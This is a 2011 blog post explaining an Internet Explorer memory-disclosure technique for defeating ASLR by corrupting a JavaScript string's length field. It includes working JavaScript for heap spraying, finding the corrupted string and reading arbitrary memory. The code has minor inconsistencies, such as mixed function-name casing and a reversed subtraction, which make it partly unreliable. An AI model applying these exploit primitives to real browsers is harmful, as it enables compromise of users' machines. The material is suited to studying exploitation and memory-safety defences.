Thursday, June 9, 2011

Memory disclosure technique for Internet Explorer

Memory disclosure became an important part of exploit development in the light of various protection mechanisms. The ability to read memory holds multiple benefits for exploit developers. The most obvious one is, of course, the ability to circumvent ASLR - if we can read the content of the memory, we can determine the address of an module, for example by reading a vtable pointer of some object and subtracting a (constant) offset. However, memory disclosure brings additional benefits as well. For example, many exploits rely on a speciffic (predictable) memory layout. If we can read memory, we do not have to make any guesses regarding the memory layout. Thus, memory disclosure can also be used to improve the reliability of exploits and enable the exploit development in conditions where the memory layout is unpredictable.
One technique for memory desclosure was used by Peter Vreugdenhil in the Pwn2Own 2010 contest (http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf). This technique consists of overwtiting a terminator of a string, which enables reading the memory immediately after the end of the string. This was enough to defeat ASLR, however, in general, it has a disadvantage that it can only read the memory up to the next null-character (that will be interpreted as the new string terminator). Additionally, there is no way to read past the end of currnet memory block (except if the next memory block begins immediately after the current block, with no unreadable memory in between).
The technique I propose here enables reading a much wider area of memory and also reading memory in other memory blocks, with unreadeable memory in between them. The technique itself is very simple, however, since I never saw anyone using or describing it, I decided to describe it here. I successfully used this technique in various exploits for Internet Explorer, most recently in an exploit for a vulnerability in Internet Explorer 8 on Windows 7.
The main idea of this technique is to overwrite the DWORD holding the length of a JavaScript string.


Background: JavaScript strings

JavaScript strings in Internet Explorer are stored in memory in the following form:


[string length in bytes][sequence of 16-bit characters]


So, for example, the string 'aaaa' will be stored as (hex):


08 00 00 00 61 00 61 00 61 00 61 00


If we overwrite the DWORD holding the string length, we can peek at the memory past the end of the string.
Assume we successfullty overwrote the length of string 'str'. By calling for example


mem = str.substr(offset/2,size/2);


we can obtain (in a string 'mem' of size 'size') the content of memory at address [address of str] + offset.
We can read any memory address provided that the offset+size is less than the new string length. Thus, the address we can read up to is only limited by the value we can overwrte string length with.


How to overwrite sting length?

The method we can use to overwrite string length will depend heavily on the vulnerablity we are exploiting. Here, I'll go through some of the most common vulnerability classes and show how they can be used to overwrite the length of a string.

1. Heap overflow: This is probably the simplest one. Allocate a string after the buffer you can overwrite. By overwriting the memory past the buffer, you'll also overwrite string length.

2. Double free: This consists of several steps: a) Free some object in memory, b) allocate a string in its place (make sure it has the same initial size as the deleted object), c) free the object again. Here we are exploiting the way how malloc and free work in windows: after a block is freed, its first DWORD will hold an address of the next free memory block of the same size or, if no such block exists, it will point back to the heap header. In both cases, the string lenght is overwritten with a large value.

3. Use-after-free: See if this vulnerability can be used to make double free. If it can, see point no. 2. If not, see if any property of the deleted object can be changed. If yes, try to allocate strings in memory so that the length of some string gets aligned with this property of the deleted object. Then change said property. Another way is to try to leverage the vulnerability into arbitrary memory address overwrite and see case no. 6.

4. Stack overflow: This is a difficult one, as JavaScript strings are allocated on the heap and not stack. However, note that stack overflow does not mean you absolutely have to overwrite the return address of the current function. Sometimes it is possible to overwrtite some address stored on the stack in between the buffer and the return address of the curent function and in this way leverage the the vulnerability into arbitrary memory address overwrite. If you can accomplish this, see case no. 6.

5. Integer overflow: This vulnerability class can be made to behave as either a) heap overflow (integer calculations are used to calculate the size of the buffer, in this case see case no. 1) or b) Arbitrary memory address overwrite (integer calculations are used to calculate the address of the buffer, in this case see case no. 6)

6. Arbitrary memory address overwrite: Many of the previous vulnerability classes (and many others, such as loop condition bugs) can be leveraged into arbitrary memory address overwrite. This case will be discussed in detail (with example code) in the next section.


Overwriting string length with arbitrary memory address overwrite

Suppose we have a JavaScript method OverwriteOffset(offset) that exploits some vulnerability to overwrite a memory at the address [address of some object]+offset with a large number. If we had a method OverwriteAbsolute(address) that overwrites the address 'address' with a large number, the analysis would be similar. However, since, in general, the first case is more difficult (as we don't know the absolute addresses) it will be discussed here.
The task in question is to use OverwriteOffset(offset) to overwrite the length of some string. However lets allso suppose that we don't know (and can't guess) the address (nor the offset) of any string.
In order to make things more predictable we will use heap spraying. So, suppose we made a heap spray that is stored in an array 'spray'. Each element of the array is a string with approximately 1MB size. Each such string will be allocated in a separate memory block of size 0x100000. We can use the following code to accomplish this.


spray = new Array(200);
var pattern = unescape("%uAAAA%uAAAA");
while(pattern.length<(0x100000/2)) pattern+=pattern;
pattern = pattern.substr(0,0x100000/2-0x100);
for(var i=0;i<200;i++) {
spray[i] = [inttostr(i)+pattern].join("");
}


The inttostr function used above converts an integer into four-byte string. This way, each string will contain its index in the first two characters. We'll come back to why I did this later.
With a heap spray as above we'll have a large probability that offset+0x100000*100 will fall somewhere in the spray. We don't know exactly where this address falls in our heap spray, however once we do the overwrite we can easily determine that as follows:

1. Overwrite a memory location somewhere in the sprayed part of the memory
2. Find out which sting we overwrote by comparing each string with its neighbor
3. Find out which characters in the string we overwrote by comparing string parts with what they originally contained. Use binary search and substr methods to speed up the process.
4. We can now calculate the offset of the string length. Overwrite the string length.

In JavaScript code, this would look like


var i;

//overwrite something in the heap spray
OverwriteOffset(0x100000*100);

//now find what and where exectly did we overwrite
readindex = -1;
for(i=1;i<200;i++) {
if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2)) {
readindex = i;
break;
}
}

if(readindex == -1) {
alert("Error overwriring first spray");
return 0;
}

//use binary search to find out the index of the character we overwrote
var start=2,len=spray[readindex].length-2,mid;
while(len>10) {
mid = Math.round(len/2);
mid = mid - mid%2;
if(spray[readindex].substr(start,mid) != spray[readindex-1].substr(start,mid)) {
len = mid;
} else {
start = start+mid;
len = len-mid;
}
}
for(i=start;i<(start+20);i=i+2) {
if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {
break;
}
}

//calculate the offset of the string length in memory
lengthoffset = 0x100000*100-i/2-1;
OverwriteOffset(lengthoffset);

//check if overwrite was successful
if(spray[readindex].length == spray[0].length) alert("error overwriting string length");




That's it, we can now read memory past the end of the string. For example, we could use the following function to read a DWORD at address [address of string]+offset


function ReadMem(offset) {
return strtoint(spray[readindex].substr(offset/2,2));
}


However, we would also like to determine the absolute address of the string, so instead of ofsets, we can provide absolute adresses to our ReadMem function. This will be discussed in the next section.


Determining the absolute address of the string

To determine the absolute address of the string we'll exploit the fact that each string in our heap spray is allocated in a separate memory block. We also know the size of such memory blocks (0x100000) and can assume that the next memory block comes immediately after the current one in memory.
Each memory block starts with a header. This header, among other things contains the address of the previous and the next memory block. So, memory block looks like:



[address of the next memory block][address of the previous memory block][24 bytes of some other header data][data]



So if we assume that the strings are placed in blocks in the following order


[block containing string 1][block containing string 2][block containing string 3] ...



we can determine the absolute address of the string in the following way, by reading the previous block pointer of the block that immediately follows the one that holds the ovrwritten string


readaddr = ReadMem(0x100000-0x20)+0x24;


This technique relies on the correct order of memory blocks. This order will usually be correct if the exploit is launched in a 'clean' Internte Explorer process (for example, if the exploit is opened in a new browser tab or window). However, in general, this does not have to be the case, so the memory could look like, for example


[block containing string 5][block containing string 7][block containing string 1] ...



However, although the order of blocks in memory may appear scrambled, the next block pointer of block containing string n will still point to the block containing string n+1. Similarly, the previous block pointer of block containing string n will still point to the block containing string n-1. Now remember that we made our heap spray so that each string contains its index in the first two characters. We can exploit this information to determine the correct absolute string address as follows:


var indexarray = new Array();
var tmpaddr = 0;
var i,index;

index = ReadMem(tmpaddr);
indexarray.push(index);

while(1) {
tmpaddr += 0x100000;
index = readmem(tmpaddr);
for(i=0;i<indexarray.length;i++) {
if(indexarray[i]==index+1) {
readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;
return 1;
} else if(indexarray[i]==index-1) {
readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;
return 1;
}
}
indexarray.push(index);
}



Finally, we can construct a function ReadMemAbsolute that reads content of a memory at absolute address as


function ReadMemAbsolute(address) {
return ReadMem(readaddr-address);
}


Helper string/integer conversion functions used throughout the code are given below.


function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

function inttostr(num) {
return String.fromCharCode(num%65536,Math.floor(num/65536));
}